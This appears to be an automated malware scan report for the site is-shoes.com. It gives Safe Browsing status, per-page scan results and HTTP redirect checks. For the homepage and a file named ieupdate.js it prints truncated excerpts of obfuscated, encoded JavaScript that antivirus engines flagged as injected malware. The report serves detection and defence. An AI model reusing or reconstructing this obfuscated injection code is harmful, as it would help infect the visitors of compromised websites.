Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=is-shoes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://is-shoes.com/ | 200 OK Content-Length: 9662 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) rkrzn=String;jsnh="spl"+"i"+"t";awg=window;ycoyk=(1)?"0x":"123";titm=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(diw){qixrqx=false;try{}catch(juri){qixrqx=21;}if(1){foqeh="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5fZq69Zq6eZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5fZq Antivirus reports:
| ||
http://is-shoes.com/ieupdate.js | 200 OK Content-Length: 11114 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) dfgrux="fr"+"omCh"+"arCo"+"de";if(document.querySelector)ifgu=4;qjs=("31,77,86,7f,74,85,7a,80,7f,31,84,88,41,4a,39,3a,31,8c,1e,1b,31,87,72,83,31,84,85,72,85,7a,74,4e,38,72,7b,72,89,38,4c,1e,1b,31,87,72,83,31,74,80,7f,85,83,80,7d,7d,76,83,4e,38, Antivirus reports:
| ||
http://is-shoes.com/site.asp | 200 OK Content-Length: 10752 Content-Type: text/html | clean |
http://is-shoes.com/index.htm | 200 OK Content-Length: 9662 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) rkrzn=String;jsnh="spl"+"i"+"t";awg=window;ycoyk=(1)?"0x":"123";titm=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(diw){qixrqx=false;try{}catch(juri){qixrqx=21;}if(1){foqeh="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5fZq69Zq6eZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5fZq Antivirus reports:
| ||
http://is-shoes.com/site.asp?idioma=en | 200 OK Content-Length: 10808 Content-Type: text/html | clean |
http://is-shoes.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://is-shoes.com/site.asp?idioma=it | 200 OK Content-Length: 10814 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: is-shoes.com
Result:
HTTP/1.1 200 OK
Date: Tue, 08 Jul 2014 21:54:43 GMT
ETag: "adb06a97ecc3ce1:5a7e6"
Server: Microsoft-IIS/6.0
Content-Length: 9662
Content-Type: text/html
Last-Modified: Tue, 08 Oct 2013 06:06:56 GMT
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...9662 bytes of data.
GET / HTTP/1.1
Host: is-shoes.com
Result:
HTTP/1.1 200 OK
Date: Tue, 08 Jul 2014 21:54:43 GMT
ETag: "adb06a97ecc3ce1:5a7e6"
Server: Microsoft-IIS/6.0
Content-Length: 9662
Content-Type: text/html
Last-Modified: Tue, 08 Oct 2013 06:06:56 GMT
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...9662 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: is-shoes.com
Referer: http://www.google.com/search?q=is-shoes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: is-shoes.com
Referer: http://www.google.com/search?q=is-shoes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.